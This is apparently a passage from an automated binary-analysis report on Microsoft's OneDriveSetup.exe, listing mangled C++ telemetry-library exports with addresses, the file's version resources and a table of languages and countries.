                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z870x1400a7310
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBV?$vector@NV?$allocator@N@std@@@std@@@Z880x1400a7390
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBV?$vector@UGUID_t@Events@Applications@Microsoft@@V?$allocator@UGUID_t@Events@Applications@Microsoft@@@std@@@std@@@Z890x1400a73f0
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@@Z900x1400a7450
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBV?$vector@_JV?$allocator@_J@std@@@std@@@Z910x1400a74b0
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@C@Z920x1400a7510
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@E@Z930x1400a7520
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@F@Z940x1400a7530
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@G@Z950x1400a7540
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@H@Z960x1400a7550
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@I@Z970x1400a7560
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@J@Z980x1400a7550
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@N@Z990x1400a7570
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@PEBD@Z1000x1400a75a0
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@UGUID_t@123@@Z1010x1400a7600
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@Utime_ticks_t@123@@Z1020x1400a7640
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@_J@Z1030x1400a7680
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@_K@Z1040x1400a76b0
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@_N@Z1050x1400a76c0
                                                                        ??4GUID_t@Events@Applications@Microsoft@@QEAAAEAU0123@AEBU0123@@Z1060x14009a610
                                                                        ??4IAuthTokensController@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1070x14000bad0
                                                                        ??4ILogConfiguration@Events@Applications@Microsoft@@QEAAAEAV0123@$$QEAV0123@@Z1080x14009a620
                                                                        ??4ILogConfiguration@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1090x14009a6b0
                                                                        ??4ILogController@Events@Applications@Microsoft@@QEAAAEAV0123@$$QEAV0123@@Z1100x14000bad0
                                                                        ??4ILogController@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1110x14000bad0
                                                                        ??4ILogManager@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1120x14000bad0
                                                                        ??4ILogger@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1130x14000bad0
                                                                        ??4IModule@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1140x14000bad0
                                                                        ??4ISemanticContext@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1150x14000bad0
                                                                        ??4LogConfiguration@Telemetry@Applications@Microsoft@@QEAAAEAU0123@$$QEAU0123@@Z1160x14009a720
                                                                        ??4LogConfiguration@Telemetry@Applications@Microsoft@@QEAAAEAU0123@AEBU0123@@Z1170x14009a7b0
                                                                        ??4LogManagerProvider@Events@Applications@Microsoft@@QEAAAEAV0123@$$QEAV0123@@Z1180x14000bad0
                                                                        ??4LogManagerProvider@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z1190x14000bad0
                                                                        ??4time_ticks_t@Events@Applications@Microsoft@@QEAAAEAU0123@AEBU0123@@Z1200x14009a840
                                                                        ??8EventProperty@Events@Applications@Microsoft@@QEBA_NAEBU0123@@Z1210x1400a76f0
                                                                        ??8GUID_t@Events@Applications@Microsoft@@QEBA_NAEBU0123@@Z1220x1400a7c10
                                                                        ??AILogConfiguration@Events@Applications@Microsoft@@QEAAAEAVVariant@123@PEBD@Z1230x1400a4340
                                                                        ??DILogConfiguration@Events@Applications@Microsoft@@QEAAAEAV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@VVariant@Events@Applications@Microsoft@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@VVariant@Events@Applications@Microsoft@@@std@@@2@@std@@XZ1240x14000bad0
                                                                        ??MGUID_t@Events@Applications@Microsoft@@QEBA_NAEBU0123@@Z1250x1400a7c60
                                                                        ??YEventProperties@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@2@@std@@@Z1260x1400a1da0
                                                                        ??_7DebugEventDispatcher@Events@Applications@Microsoft@@6B@1270x140357530
                                                                        ??_7DebugEventListener@Events@Applications@Microsoft@@6B@1280x1403586c8
                                                                        ??_7DebugEventSource@Events@Applications@Microsoft@@6B@1290x140357548
                                                                        ??_7EventProperties@Events@Applications@Microsoft@@6B@1300x140367be0
                                                                        ??_7EventProperty@Events@Applications@Microsoft@@6B@1310x140368300
                                                                        ??_7IAuthTokensController@Events@Applications@Microsoft@@6B@1320x140367330
                                                                        ??_7ILogController@Events@Applications@Microsoft@@6B@1330x140367378
                                                                        ??_7ILogManager@Events@Applications@Microsoft@@6BDebugEventDispatcher@123@@1340x140367558
                                                                        ??_7ILogManager@Events@Applications@Microsoft@@6BIContextProvider@123@@1350x140367540
                                                                        ??_7ILogManager@Events@Applications@Microsoft@@6BILogController@123@@1360x1403673e0
                                                                        ??_7ILogger@Events@Applications@Microsoft@@6B@1370x1403671d8
                                                                        ??_7IModule@Events@Applications@Microsoft@@6B@1380x140366e88
                                                                        ??_7ISemanticContext@Events@Applications@Microsoft@@6B@1390x140366eb8
                                                                        ?AddEventListener@DebugEventSource@Events@Applications@Microsoft@@UEAAXW4DebugEventType@234@AEAVDebugEventListener@234@@Z1400x1400a0120
                                                                        ?AddModule@ILogConfiguration@Events@Applications@Microsoft@@QEAAXPEBDAEBV?$shared_ptr@VIModule@Events@Applications@Microsoft@@@std@@@Z1410x1400a43f0
                                                                        ?AttachEventSource@DebugEventSource@Events@Applications@Microsoft@@UEAA_NAEAV1234@@Z1420x1400a01d0
                                                                        ?ClearExperimentIds@ISemanticContext@Events@Applications@Microsoft@@UEAAXXZ1430x1400094a0
                                                                        ?CreateLogManager@LogManagerProvider@Events@Applications@Microsoft@@SAPEAVILogManager@234@AEAVILogConfiguration@234@AEAW4status_t@234@@Z1440x14009ae90
                                                                        ?CreateLogManager@LogManagerProvider@Events@Applications@Microsoft@@SAPEAVILogManager@234@PEBDAEAW4status_t@234@_K@Z1450x14009aea0
                                                                        ?CreateLogManager@LogManagerProvider@Events@Applications@Microsoft@@SAPEAVILogManager@234@PEBD_NAEAVILogConfiguration@234@AEAW4status_t@234@_K@Z1460x14009aeb0
                                                                        ?DecrementActiveHydrationsCount@QoS@@YAXXZ1470x1402c9910
                                                                        ?DestroyLogManager@LogManagerProvider@Events@Applications@Microsoft@@SA?AW4status_t@234@PEBD@Z1480x14009afc0
                                                                        ?DetachEventSource@DebugEventSource@Events@Applications@Microsoft@@UEAA_NAEAV1234@@Z1490x1400a0270
                                                                        ?DispatchEvent@DebugEventSource@Events@Applications@Microsoft@@UEAA_NVDebugEvent@234@@Z1500x1400a02f0
                                                                        ?DispatchEventBroadcast@ILogManager@Events@Applications@Microsoft@@SA_NVDebugEvent@234@@Z1510x1400bca00
                                                                        ?FromJSON@Events@Applications@Microsoft@@YA?AVILogConfiguration@123@PEBD@Z1520x1400b3bb0
                                                                        ?FromLogConfiguration@Events@Applications@Microsoft@@YA?AVILogConfiguration@123@AEAULogConfiguration@Telemetry@23@@Z1530x1400b3d70
                                                                        ?Get@LogManagerProvider@Events@Applications@Microsoft@@CAPEAVILogManager@234@AEAVILogConfiguration@234@AEAW4status_t@234@@Z1540x1400a4a90
                                                                        ?Get@LogManagerProvider@Events@Applications@Microsoft@@CAPEAVILogManager@234@PEBDAEAW4status_t@234@@Z1550x1400a4ad0
                                                                        ?GetActiveHydrationsCount@QoS@@YAIXZ1560x1402c9920
                                                                        ?GetApplicationPropertyId@QoS@@YA?AW4Id@PropertyId@TelemetryConstants@@XZ1570x1402c9930
                                                                        ?GetDefaultConfiguration@Events@Applications@Microsoft@@YAAEBVILogConfiguration@123@XZ1580x1400b4160
                                                                        ?GetErrorType@QoS@@YA?AW4Type@ErrorType@TelemetryConstants@@JI@Z1590x1402c9940
                                                                        ?GetErrorType@QoS@@YA?AW4Type@ErrorType@TelemetryConstants@@JIAEBV?$set@IU?$less@I@std@@V?$allocator@I@2@@std@@@Z1600x1402c99b0
                                                                        ?GetInstance@Telemetry@@CAPEAV1@XZ1610x1402c9d90
                                                                        ?GetLatency@EventProperties@Events@Applications@Microsoft@@QEBA?AW4EventLatency@234@XZ1620x1400a1f80
                                                                        ?GetLogObfuscationKeyManger@@YAJPEAPEAVILogObfuscationKeyManager@@@Z1630x14004dcc0
                                                                        ?GetLogObfuscatorAes@@YAJPEAPEAVILogObfuscatorAes@@@Z1640x14004b4a0
                                                                        ?GetModule@ILogConfiguration@Events@Applications@Microsoft@@QEAA?AV?$shared_ptr@VIModule@Events@Applications@Microsoft@@@std@@PEBD@Z1650x1400a44c0
                                                                        ?GetModules@ILogConfiguration@Events@Applications@Microsoft@@QEAAAEAV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$shared_ptr@VIModule@Events@Applications@Microsoft@@@2@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$shared_ptr@VIModule@Events@Applications@Microsoft@@@2@@std@@@2@@std@@XZ1660x1400a4710
                                                                        ?GetName@EventProperties@Events@Applications@Microsoft@@QEBAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ1670x140027f50
                                                                        ?GetPersistence@EventProperties@Events@Applications@Microsoft@@QEBA?AW4EventPersistence@234@XZ1680x1400a1f90
                                                                        ?GetPiiProperties@EventProperties@Events@Applications@Microsoft@@QEBA?BV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$pair@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4PiiKind@Events@Applications@Microsoft@@@2@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$pair@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4PiiKind@Events@Application1690x1400a1fa0
                                                                        ?GetPolicyBitFlags@EventProperties@Events@Applications@Microsoft@@QEBA_KXZ1700x1400a2210
                                                                        ?GetPopSample@EventProperties@Events@Applications@Microsoft@@QEBANXZ1710x1400a2220
                                                                        ?GetPriority@EventProperties@Events@Applications@Microsoft@@QEBA?AW4EventPriority@234@XZ1720x1400a1f80
                                                                        ?GetProperties@EventProperties@Events@Applications@Microsoft@@QEBAAEBV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@2@@std@@W4DataCategory@234@@Z1730x1400a2230
                                                                        ?GetResultType@QoS@@YAPEB_WJI@Z1740x1402c9ad0
                                                                        ?GetResultType@QoS@@YAPEB_WW4Type@ErrorType@TelemetryConstants@@@Z1750x1402c9af0
                                                                        ?GetTimestamp@EventProperties@Events@Applications@Microsoft@@QEBA_JXZ1760x1400a2250
                                                                        ?GetType@EventProperties@Events@Applications@Microsoft@@QEBAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ1770x1400a2260
                                                                        ?HasConfig@ILogConfiguration@Events@Applications@Microsoft@@QEAA_NPEBD@Z1780x1400a4720
                                                                        ?Hash@GUID_t@Events@Applications@Microsoft@@QEBA_KXZ1790x1400a7e40
                                                                        ?IncrementActiveHydrationsCount@QoS@@YAXXZ1800x1402c9b20
                                                                        ?Initialize@IModule@Events@Applications@Microsoft@@UEAAXPEAVILogManager@234@@Z1810x1400094a0
                                                                        ?InsertIntoIrmEnabledLibrarySet@QoS@@YAXAEBV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z1820x1402c9b30
                                                                        ?IsAnyLibraryIrmEnabled@QoS@@YA_NXZ1830x1402c9b40
                                                                        ?Release@LogManagerProvider@Events@Applications@Microsoft@@SA?AW4status_t@234@AEAVILogConfiguration@234@@Z1840x1400a4b90
                                                                        ?Release@LogManagerProvider@Events@Applications@Microsoft@@SA?AW4status_t@234@PEBD@Z1850x1400a4bc0
                                                                        ?RemoveEventListener@DebugEventSource@Events@Applications@Microsoft@@UEAAXW4DebugEventType@234@AEAVDebugEventListener@234@@Z1860x1400a04b0
                                                                        ?RemoveFromIrmEnabledLibrarySet@QoS@@YAXAEBV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z1870x1402c9b50
                                                                        ?SetAppEnv@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1880x14009afd0
                                                                        ?SetAppExperimentETag@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1890x14009b0c0
                                                                        ?SetAppExperimentIds@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1900x14009b1c0
                                                                        ?SetAppExperimentImpressionId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1910x14009b2b0
                                                                        ?SetAppId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1920x14009b3a0
                                                                        ?SetAppLanguage@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1930x14009b490
                                                                        ?SetAppName@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1940x14009b580
                                                                        ?SetAppVersion@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1950x14009b670
                                                                        ?SetApplicationId@QoS@@YAXI@Z1960x1402c9b60
                                                                        ?SetCommercialId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z1970x14009b760
                                                                        ?SetCommonField@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBUEventProperty@234@@Z1980x1400094a0
                                                                        ?SetCustomField@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBUEventProperty@234@@Z1990x1400094a0
                                                                        ?SetDeviceClass@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2000x14009b850
                                                                        ?SetDeviceId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2010x14009b940
                                                                        ?SetDeviceMake@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2020x14009ba30
                                                                        ?SetDeviceModel@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2030x14009bb20
                                                                        ?SetDeviceOrgId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2040x14009bc10
                                                                        ?SetEventExperimentIds@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z2050x1400094a0
                                                                        ?SetLatency@EventProperties@Events@Applications@Microsoft@@QEAAXW4EventLatency@234@@Z2060x1400a2270
                                                                        ?SetLevel@EventProperties@Events@Applications@Microsoft@@QEAAXE@Z2070x14009bd00
                                                                        ?SetName@EventProperties@Events@Applications@Microsoft@@QEAA_NAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2080x1400a2280
                                                                        ?SetNetworkCost@ISemanticContext@Events@Applications@Microsoft@@UEAAXW4NetworkCost@234@@Z2090x14009bdc0
                                                                        ?SetNetworkProvider@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2100x14009bef0
                                                                        ?SetNetworkType@ISemanticContext@Events@Applications@Microsoft@@UEAAXW4NetworkType@234@@Z2110x14009bfe0
                                                                        ?SetOsBuild@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2120x14009c110
                                                                        ?SetOsName@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2130x14009c200
                                                                        ?SetOsVersion@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2140x14009c2f0
                                                                        ?SetPersistence@EventProperties@Events@Applications@Microsoft@@QEAAXW4EventPersistence@234@@Z2150x1400a23c0
                                                                        ?SetPolicyBitFlags@EventProperties@Events@Applications@Microsoft@@QEAAX_K@Z2160x1400a23d0
                                                                        ?SetPopsample@EventProperties@Events@Applications@Microsoft@@QEAAXN@Z2170x1400a23e0
                                                                        ?SetPriority@EventProperties@Events@Applications@Microsoft@@QEAAXW4EventPriority@234@@Z2180x1400a23f0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0W4PiiKind@234@W4DataCategory@234@@Z2190x1400a2430
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEAV?$vector@NV?$allocator@N@std@@@6@W4PiiKind@234@W4DataCategory@234@@Z2200x1400a2480
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEAV?$vector@UGUID_t@Events@Applications@Microsoft@@V?$allocator@UGUID_t@Events@Applications@Microsoft@@@std@@@6@W4PiiKind@234@W4DataCategory@234@@Z2210x1400a24d0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@6@W4PiiKind@234@W4DataCategory@234@@Z2220x1400a2520
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEAV?$vector@_JV?$allocator@_J@std@@@6@W4PiiKind@234@W4DataCategory@234@@Z2230x1400a2570
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CW4PiiKind@234@W4DataCategory@234@@Z2240x14009c3e0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@EW4PiiKind@234@W4DataCategory@234@@Z2250x14009c3f0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@FW4PiiKind@234@W4DataCategory@234@@Z2260x14009c400
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@GW4PiiKind@234@W4DataCategory@234@@Z2270x14009c410
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HW4PiiKind@234@W4DataCategory@234@@Z2280x14009c420
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IW4PiiKind@234@W4DataCategory@234@@Z2290x14009c430
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@NW4PiiKind@234@W4DataCategory@234@@Z2300x1400a25c0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDW4PiiKind@234@W4DataCategory@234@@Z2310x1400a2610
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@234@@Z2320x1400a2660
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UGUID_t@234@W4PiiKind@234@W4DataCategory@234@@Z2330x1400a2760
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Utime_ticks_t@234@W4PiiKind@234@W4DataCategory@234@@Z2340x1400a27b0
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_JW4PiiKind@234@W4DataCategory@234@@Z2350x1400a2810
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_KW4PiiKind@234@W4DataCategory@234@@Z2360x14009c440
                                                                        ?SetProperty@EventProperties@Events@Applications@Microsoft@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_NW4PiiKind@234@W4DataCategory@234@@Z2370x1400a2860
                                                                        ?SetTicket@ISemanticContext@Events@Applications@Microsoft@@UEAAXW4TicketType@234@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2380x1400094a0
                                                                        ?SetTimestamp@EventProperties@Events@Applications@Microsoft@@QEAAX_J@Z2390x1400a28b0
                                                                        ?SetType@EventProperties@Events@Applications@Microsoft@@QEAA_NAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2400x1400a28c0
                                                                        ?SetUserANID@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2410x14009c450
                                                                        ?SetUserAdvertisingId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2420x14009c540
                                                                        ?SetUserId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4PiiKind@234@@Z2430x14009c630
                                                                        ?SetUserLanguage@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2440x14009c710
                                                                        ?SetUserMsaId@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2450x14009c800
                                                                        ?SetUserTimeZone@ISemanticContext@Events@Applications@Microsoft@@UEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z2460x14009c8f0
                                                                        ?SizeUnknown@QoS@@YAIXZ2470x14000abd0
                                                                        ?Teardown@IModule@Events@Applications@Microsoft@@UEAAXXZ2480x1400094a0
                                                                        ?TryGetLevel@EventProperties@Events@Applications@Microsoft@@QEBA?AV?$tuple@_NE@std@@XZ2490x1400a2a60
                                                                        ?clear@EventProperty@Events@Applications@Microsoft@@QEAAXXZ2500x1400a8090
                                                                        ?convertUintVectorToGUID@GUID_t@Events@Applications@Microsoft@@SA?AU_GUID@@AEBV?$vector@EV?$allocator@E@std@@@std@@@Z2510x1400a8140
                                                                        ?copydata@EventProperty@Events@Applications@Microsoft@@AEAAXPEBU1234@@Z2520x1400a81a0
                                                                        ?empty@EventProperty@Events@Applications@Microsoft@@QEAA_NXZ2530x1400a8330
                                                                        ?erase@EventProperties@Events@Applications@Microsoft@@QEAA_KAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4DataCategory@234@@Z2540x1400a2e40
                                                                        ?lock@?1??stateLock@DebugEventSource@Events@Applications@Microsoft@@KAAEAVrecursive_mutex@std@@XZ@4V67@A2550x140483be0
                                                                        ?pack@EventProperties@Events@Applications@Microsoft@@QEAAPEAUevt_prop@@XZ2560x1400a2e60
                                                                        ?stateLock@DebugEventSource@Events@Applications@Microsoft@@KAAEAVrecursive_mutex@std@@XZ2570x14009f4a0
                                                                        ?to_bytes@GUID_t@Events@Applications@Microsoft@@QEBAXAEAY0BA@E@Z2580x1400a8450
                                                                        ?to_string@EventProperty@Events@Applications@Microsoft@@UEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ2590x1400a84a0
                                                                        ?to_string@GUID_t@Events@Applications@Microsoft@@QEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ2600x1400a8d50
                                                                        ?type_name@EventProperty@Events@Applications@Microsoft@@SAPEBDI@Z2610x1400a8d70
                                                                        ?unpack@EventProperties@Events@Applications@Microsoft@@QEAA_NPEAUevt_prop@@_K@Z2620x1400a3130
                                                                        OnLoadTelemetryExtensions2630x1400094a0
                                                                        evt_api_call_default2640x140096ce0
                                                                        DescriptionData
                                                                        CompanyNameMicrosoft Corporation
                                                                        FileDescriptionMicrosoft OneDrive (64 bit) Setup
                                                                        InternalNameOneDriveSetup.exe
                                                                        LegalCopyright Microsoft Corporation. All rights reserved.
                                                                        OriginalFilenameOneDriveSetup.exe
                                                                        ProductNameMicrosoft OneDrive
                                                                        FileVersion25.005.0112.0003
                                                                        ProductVersion25.005.0112.0003
                                                                        SpecialBuildb/build/5b5eba1c-4d84-82ed-887a-8783299e9892
                                                                        Translation0x0409 0x04b0
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        CatalanSpain
                                                                        ChineseTaiwan
                                                                        CzechCzech Republic
                                                                        DanishDenmark
                                                                        GermanGermany
                                                                        GreekGreece
                                                                        FinnishFinland
                                                                        FrenchFrance
                                                                        HebrewIsrael
                                                                        HungarianHungary
                                                                        ItalianItaly
                                                                        JapaneseJapan
                                                                        KoreanNorth Korea
                                                                        KoreanSouth Korea
                                                                        DutchNetherlands
                                                                        NorwegianNorway
                                                                        PolishPoland
                                                                        PortugueseBrazil
                                                                        RomanianRomania
                                                                        RussianRussia
                                                                        CroatianCroatia
                                                                        SlovakSlovakia
                                                                        SwedishSweden
                                                                        ThaiThailand
                                                                        TurkishTurkey
                                                                        IndonesianIndonesia
                                                                        UkrainianUkrain
                                                                        SlovenianSlovenia
                                                                        EstonianEstonia
                                                                        LatvianLativa
                                                                        LithuanianLithuania
                                                                        VietnameseVietnam
                                                                        SetsuanaSouth Africa
                                                                        HindiIndia
                                                                        MalteseMalta
                                                                        MalayMalaysia
                                                                        TamilSri Lanka
                                                                        KannadaKanada
                                                                        WelshEngland
                                                                        AmharicEthiopia
                                                                        NepaliNepal
                                                                        FilipinoPhilippines
